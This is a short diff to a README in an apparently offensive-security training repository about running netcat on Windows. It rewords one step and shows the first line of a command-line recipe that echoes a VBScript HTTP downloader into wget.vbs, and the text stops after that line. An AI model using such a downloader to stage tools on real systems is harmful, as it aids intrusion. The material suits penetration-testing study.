HackTheBridge/netcat_for_windows/README.md

-You may need to create a HTTP Downloader which can be done by copying and pasting the following code and pasting it to the Windows CLI:
+You may need to create a HTTP Downloader which can be done by copying the following code and pasting it to the Windows CLI:

 ```echo strUrl = WScript.Arguments.Item(0) > wget.vbs